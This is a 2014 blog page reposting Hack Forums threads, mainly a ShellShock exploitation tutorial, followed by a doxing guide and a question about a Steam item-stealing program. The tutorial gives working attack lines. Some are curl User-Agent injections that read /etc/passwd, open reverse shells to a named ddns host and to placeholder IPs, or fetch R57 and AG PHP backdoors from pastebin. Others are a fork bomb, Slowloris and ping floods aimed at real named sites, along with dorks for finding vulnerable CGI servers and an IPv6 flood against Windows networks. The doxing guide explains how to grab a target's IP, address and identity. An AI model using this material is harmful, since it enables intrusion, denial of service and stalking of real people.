Tuesday, October 28, 2014

Hack Forums - Hacking Tutorials

Hack Forums - Hacking Tutorials

Complete ShellShock TuT

Posted: 28 Oct 2014 08:04 AM PDT

I recently met a very cool japanese hacker online who help me completely understand the vulnerability ShellShock and all the different ways to exploit it... so im here to pass on his knowledge! If you this informative or helpful please give posative reputation Black Hat



This year probably the biggest vulnerablility ever was disclosed, it was dubbed 'ShellShock'. It was a vulnerability in all systems implimenting Bash, which is the majority of Linux and Mac operating systems. Just the simple string () { :;}; when injected into a bash enviroment variable or a process that uses bash like Headers, User-Agent, Refferer, Curl and Wget will allow a remote code execution... this 0-day is 100x worse than HeartBleed!! Especially since there are 5 versions of the exploit... Ninja


--------------------------- How to "Patch" lol -------------------------

sudo apt-get update && sudo apt-get install --only-upgrade bash

or

yum -y update bash; apt-get -y update bash; reboot



--Exploit 1 (CVE-2014-6271)--

There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

env x='() { :;}; echo RMS' bash -c "echo PWNed you"

'() { :; }; bash -i >& /dev/tcp/0xsynack.ddns.net/31337 0>&1'

If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.



--Exploit 2 (CVE-2014-7169)--

Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.

env X='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo

If the above command outputs the current date (it may also show errors), you are still vulnerable.



---Exploit 3 (???)---

Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.

env -i X=' () { }; echo hello' bash -c 'date'

If the above command outputs "hello", you are vulnerable.



------Exploit 4 (CVE-2014-7186)-------

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"


---------------Exploit 5 (CVE-2014-7187)-----------------

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"


---Different Enviroment Variable Injections:---

() { :; }; :(){ :|: & };:
() { (a)=>\
() { :; };




The types of exploits with ShellShock are literally endless, especially if you get a reverse tcp shell or a PHP backdoor shell! Just gonna show a few examples here like...
- Dorking
- Data download/upload
- DDoS
- Netcat Reverse Tcp Shell
- AG or R57 shell upload (a simple backdoor incase they patch bash)

Using the different utils like Curl, Wget or a User Agent Switcher.
Servers with /cgi-bin/ folder and .sh or .cgi extensions are vulnerable unless updated \!/

+ ShellShock Dorks +
filetype:cgi
inurl:cgi-bin filetype:cgi
inurl:cgi-bin filetype:sh
inurl:"server-status" intitle:apache "cgi-bin"
sitemap.xml filetype:xml intext:"cgi-bin"
filetype:sh inurl:cgi-bin site:[your domain]
inurl:cgi-bin "GATEWAY_INTERFACE = CGI"
inurl:/cgi-sys/entropysearch.cgi
inurl:/cgi-sys/FormMail-clone.cgi


------------- Breakdown -----------------

curl -A '() { :;}; ping -l 100000 -n 1000 x.x.x.x' website.com/cgi-bin/example.sh
^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^
util exploit the payload vulnerable slave


Easiest and quickest way to find out 100% if site vuln to shellshock is to try and echo content of a folder during a curl download. If there is extra output in top of the saved file then they are vulnerable if the downloaded file look normal then its not. Most people just use 3rd party sites to check if vulnerable but they can give false posatives alot...



-------------Curl Data Manipulation----------------------------------------------------
Easiest and quickest way
curl -A "() { :; }; echo; /bin/ls lah" website.com/cgi-bin/ex.sh > data.html
curl -A "() { :; }; echo; /bin/ls -l /bin" website.com/cgi-bin/ex.sh > data.html
curl -A "() { :; }; echo; /bin/cat /etc/passwd" website.com/cgi-bin/ex.sh > data.html



--------- + User Agent Switcher +-----------------
Probably the easiest to do for the lazyies lol
All you have to do is download the correct addon for your browser, fill in different user agent shellshock exploits then just browse to the vulnerable site to exploit!

Chrome:
https://chrome.google.com/webstore/detai...g?hl=en-US
Firefox:
https://addons.mozilla.org/en-US/firefox...-switcher/


Fork Bomb DoS:
() { :; }; :(){ :|: & };:
Ping of Death:
() { :;}; ping -l 100000 -n 1000 dwsd.org -S google.com
Slowloris:
() { :;}; wget http://pastebin.com/raw.php?i=FzrZ2hdr -O /tmp/slowloris.pl;chmod 777 /tmp/slowloris.pl;./tmp/slowloris.pl -dns http://www.dwsd.org -port 80 -timeout 2000 -num 500 -tcpto 5 -shost google.com
Reverse TCP Shell:
() { :; }; bash -i >& /dev/tcp/IPADDRESS/31337 0>&1
Backdoor R57 Shell:
() { :; }; wget http://pastebin.com/raw.php?i=S9tzBgg3 -O license.php; chmod 777 license.php


-------------------------------------- Reverse Tcp Shell -----------------------------------

nc -l 31337

bash -i >& /dev/tcp/No-IP Address/31337 0>&1

curl -A '() { :; }; /bin/bash -i >& /dev/tcp/No-IP address/31337 0>&1' crossovers.net/cgi-bin/fortune.sh



------------------------------- PHP Backdoor Shells -----------------------------------

---- R57 Shell ----
curl -A "() { :; }; wget http://pastebin.com/raw.php?i=S9tzBgg3 -O license.php; chmod 777 license.php" http://www.ocnus.com/cgi-bin/stereogram.sh

---- AG Shell ----
curl -A "() { :; }; wget https://ghostbin.com/paste/233za/raw -O license.php; chmod 777 license.php"




-------------- DoS any Windows Machine on Network ;) -------------------
Once you haves reverse tcp shell or PHP shell you can do fun things like DoS all windows machines on their network Yeye

echo 'Passw0rd' | sudo -S cat /etc/shadow

sudo su

apt-get install thc-ipv6
yum install thc-ipv6
apt-rpm install thc-ipv6

atk6-flood_router26 eth0
atk6-flood_router26 wlan0

cannot find win32...

Posted: 28 Oct 2014 03:23 AM PDT

hello all :)
how are you i hope you good and fine :)

its me Mr.Altenen
i have problem with setup kali on my windows
when i click the setup
its giving this error

cannot find win32.loader.ini
?
what is the problem
i'm use win 7 and i wanna use kali too in my computer
like windows 7 and ubuntu

How to Dox (No IT Skills Needed)

Posted: 28 Oct 2014 03:18 AM PDT

Before we start, I suggest using this for doxing. This will help keep things organized.

Username/s/:

E-mail:

City:

Zip/Postal:

State/Province:

Country:

IP address:

ISP:

Operating System:

Home Address:

Phone number:

Cell Phone number:

Website:

Photos

You can add more to this list if needed.

How to get IP address?

I suggest using http://whatstheirip.com

On this website, you enter your e-mail, and you get a set of links. Pick any link, copy and paste, and give the link to your slave saying something similar to this "LOL THIS IS HILARIOUS". Once clicked, the IP will be sent to your e-mail

If your slave has e-mailed you, you can get the IP from looking at the e-mail source. To look at the e-mail source for Windows Live users, right click on the message, and click 'View Message Source'. When you're looking at the source, look for this: 'Received: by' It will show you an IP address. This is the IP address of your slave.

If your slave has commented on your blog (wordpress or blogspot) you can view the IP address by looking in your comments.

Once you have the IP address of your slave, go to http://ipaddress.com and enter the IP of your slave. You now have the location, zip code, state, country, ISP, and operating system. Fill all this in your notepad and keep going.

How to get e-mail?

If you do not have trust of your slave, Google the user and put @ at the end. Example: 'username' @. If the user has posted their e-mail on any website, it should come up and you can find his e-mail.

If you do have trust of your slave, make a new msn account(if you don't want them having your main msn), have him/her add you on msn. You now have the e-mail of your slave.

Facebook:

Put in the e-mail of your slave in Facebook search. If your slave uses Facebook, you can find out (at the minimum) their name. If your slave uses Facebook but does not protect their information, you can find out loads of information.

The PayPal Method:

When you have the e-mail of your slave, login to PayPal. Transfer .01 USD to the e-mail of your slave. When sent, you will have all of the information on the PayPal account. (Name, address, phone, etc.)

Tracing Photos:

If your slave has photos online, save the photo and go to a website named http://tineye.com
On this website, upload the picture of your slave. When it is finished, you can find if this photo is uploaded on any other websites. You can also find out if the photo is fake.

Address:

If you have the name of your slave, it is possible you can find the address of your slave. I suggest using the following websites:

http://411.com
http://whitepages.com

Using these websites you can also find out their phone.
Note My Sources Are http://www.egyhacks.net/2012/04/how-to-dox.html

Lol OCE sentry config help!

Posted: 28 Oct 2014 03:03 AM PDT

Can anyone give me the OCE config file or do they know how to edit a NA file to change it to OCE? PLease help!

Help With This?

Posted: 27 Oct 2014 08:37 PM PDT

Alrighty! I am not sure if you are families with Steam and CS:GO skins so here is a breef description. You can buy and play games on steam with other people and there are various items that you can trade that have value(Only in steam) such as CS:GO skins. CS:GO is a Counter Strike game on Steam that people play for competition. Skins have pretty much no use other than to show off and see who has the most expensive one.

Now, my friend has a program that allows him to send it to other people and when they open it, it will automatically send him a trade notification with all of the skins in the other persons inventory for you to steal. I thought maybe he was just ratting someone and sending the trade offer from there but he says that it is automatic.

If you have any idea what this is, or could maybe explain this to me I would EXTREMELY appreciate it. Thanks in advance!
at

No comments:

Post a Comment